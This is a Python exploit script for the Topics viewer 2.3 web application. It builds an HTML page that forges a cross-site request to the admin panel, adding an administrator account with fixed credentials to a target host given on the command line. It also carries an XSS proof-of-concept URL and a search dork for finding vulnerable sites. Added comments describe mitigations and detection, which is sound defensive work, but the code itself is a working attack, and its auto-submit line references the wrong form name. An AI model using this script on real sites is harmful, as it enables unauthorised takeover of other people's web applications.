#!/usr/bin/env python
########################################################################
# Title : Topics viewer v 2.3 csrf Add Admin and XSS
# Author : Cyber-Crystal
# Version : 2.3
# Homepage : http://nilehoster.com/default/topicsviewer
# Dork : "Programmed by : Nilehoster.com"
# Tested on: Win/7
# Based on POC : http://vb.ehcommunity.com/showthread.php?t=70682
# Date : 14 May 2012 (no CVE identifier given)
#---------------------------------------------------------------------
# ^_^ > snc0pe | secure-x41 | Dmar al3noOoz | al-swisre || All
#
#
# XSS proof of concept (the id parameter of edit_block.php):
# http://localhost//admincp/edit_block.php?id=XSS
import sys
import string
import os
def banner():
    """Print the usage banner shown when no target URL is given."""
    usage = '''
----------------------------------
Topics viewer v 2.3 csrf Add Admin
----------------------------------
[+] python Exploit.py http://www.exp.com
'''
    # A single parenthesised argument prints identically under Python 2 and 3.
    print(usage)
# Cosmetic console setup only: clear the screen and, on Windows, change the
# console colour. Nothing here touches the target.
if os.name != "nt":
    os.system('clear')
else:
    os.system("cls")
    os.system("color e")

# Without a target URL argument, show the usage banner and stop.
if not sys.argv[1:]:
    banner()
    sys.exit()
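# Reviewer note (defensive reading of this PoC): the generated page is a plain
# cross-site form POST to /admincp/main.php?op=add-admin that carries only
# fixed field values, and the 'verification' field is annotated "Any number".
# That implies the admin-creation action is accepted without a per-session
# anti-CSRF secret. Application-side mitigations: a CSRF token checked on
# every state-changing admincp request, SameSite session cookies,
# Origin/Referer validation, and re-authentication before an administrator
# account is created. For detection: review web logs for POSTs to this
# endpoint arriving with an off-site Origin/Referer, and audit the admin table
# for accounts matching the fixed values below.

# Reduce the argument to a bare host string: drops the "http://" scheme and
# every "/" character.
# NOTE(review): the value is embedded in the HTML below without escaping.
vic = sys.argv[1].replace("http://", "").replace("/", "")

db = ("<html>\n"
      "<body>\n"
      "<form action='http://"+vic+"/admincp/main.php?op=add-admin' method='post' name='sdf'>\n"
      "<input type='text' name='u_name' value='p0c' />\n"
      "<input type='text' name='u_m_pass' value='1212' />\n"
      "<input type='text' name='u_email' value='p0c@p0c.com' />\n"
      "<input type='text' name='verification' value='101010'/> <!-- Any number-->\n"
      "<script>document.xss.submit();</script><br />\n"
      "<input type='submit' value='Exploit'/>\n"
      "</form>\n"
      "</body>\n"
      "</html>\n")

# The original left the handle open (and shadowed the Python 2 builtin
# `file`); the context manager guarantees the page is flushed and closed.
with open("Exploit.html", "w") as out:
    out.write(db)

# Single-argument parenthesised prints behave the same on Python 2 and 3.
print("Createing ...\n")
print("user Name And Password ...\n")
print("User : p0c \t Pass : 1212")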
# The End